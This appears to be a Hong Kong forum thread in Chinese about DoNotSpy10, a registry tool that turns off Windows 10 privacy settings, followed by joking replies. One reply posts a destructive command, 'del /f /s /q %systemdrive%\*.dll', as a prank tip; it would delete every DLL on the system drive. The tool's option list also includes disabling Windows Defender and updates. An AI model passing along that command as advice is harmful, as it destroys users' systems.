德國程式員成功解決37個Win10上可能會洩露私隱的設定

很多人可能不知道 Windows 10 裡的所有隱私設定預設都是開啟的，微軟會藉此收集你的使用數據，雖然用久了大概就知道可以從哪裡關閉它們，但還是要擔心一些漏網之魚，德國一位程式設計師就寫了一套小工具「DoNotSpy10」，經由修改 Windows 註冊表的方式來解決 37 個有隱私疑慮、可能導致系統問題的設定，你可以將它們選擇性關閉或是通通關閉，減少被竊取個資的機會，讓你的電腦更安全。

全文：

功能如下

廣告：在Windows資源管理器中禁用廣告*新*
廣告：禁用並重置廣告ID
廣告：在Windows Ink Workspace中禁用應用程序建議*新*
廣告：禁用藍牙廣告
廣告：禁用開始菜單應用程序建議
應用程序：禁用訪問帳戶信息
Apps：禁止訪問日曆
應用程式：停用通話記錄功能
應用程式：禁止使用相機
應用程式：禁止使用聯絡人*新功能*
應用程序：禁用訪問診斷數據*新*
應用程序：禁用訪問電子郵件*新*
應用程序：禁用對語言列表的訪問
應用程序：禁用訪問位置信息
應用程式：停用使用訊息功能
應用程式：禁止存取麥克風
應用程序：禁用訪問通知*新*
應用程序：禁用無線接入
應用程序：禁用訪問任務*新*
應用程式：停用應用程式通知
應用程序：禁用應用程序遙測
應用程序：禁用後台應用程序*新*
應用程序：禁用靜默安裝的應用程序
應用程序：禁用與設備同步
防御者：禁用Windows Defender
防御者：禁用Windows Defender Cloud Protection
防御者：禁用Windows Defender示例提交
邊緣：禁用Adobe Flash Player
邊緣：禁用頁面預測
邊緣：禁用搜索建議
邊緣：啟用不跟踪
隱私：禁用自動地圖下載
隱私：禁用生物識別
隱私：禁用啟用鎖定屏幕相機
隱私：禁用實驗
隱私：關閉您的鎖屏幕上的事實，提示，提示和更多信息
隱私：禁用手寫數據共享
隱私：禁用手寫錯誤報告
隱私：禁用庫存收集器
隱私：禁用KMS客戶端在線驗證
隱私：禁用位置*更新*
隱私：禁用OneDrive
隱私：禁用密碼顯示按鈕
隱私：禁用檢索設備元數據
隱私：禁止發送寫作信息
隱私：禁用傳感器
隱私：禁用設置同步
隱私：禁用SmartScreen篩選器的URL
隱私：禁用步驟錄音機
隱私：使用診斷數據禁用定制體驗*新*
隱私：禁用遙測
隱私：禁用關於Windows的提示
隱私：禁用WiFi感應
隱私：禁用Windows客戶體驗改善計劃
隱私：禁用Windows反饋請求
隱私：禁用Windows Media DRM Internet Access
隱私：禁用Windows歡迎體驗
隱私：顯示詳細數據使用*新*
搜索：禁用和重置Cortana
搜索：禁用認識我*更新*
搜索：禁用Web搜索
開始：不顯示最近打開的應用程序*新*
開始：不顯示最近打開的文件*新*
更新：延遲Windows升級
更新：禁用自動驅動程序更新
更新：禁用自動Windows Store更新
更新：禁用自動Windows更新
更新：通過Windows Update禁用惡意軟件刪除工具
更新：禁用其他產品的Windows更新
更新：禁用Windows更新共享

更新 : 禁用Win10

完

T R I G G E R E D

爻吾刂

等睇donotspy(清涼版)

禁用OneDrive

How dare you assume my OS!?

禁用電腦
FBI 都hack唔到

原來2015年嘅嘢嚟

個清涼版會係閂晒所有後門, 完全唔畀你開番?!

del /f /s /q %systemdrive%\*.dll
利申 慎用

停Windows Update，靠害乎？

咁又未必既

The application donotspy10-2.0-setup.tmp accesses a web resource that has been detected as infected.

樓主你玩鳩我呀?

用 linux

[突發] 連尼住同《戰月勇者》合作！推出LIHKG主題扭蛋活動？

有得抽mr.a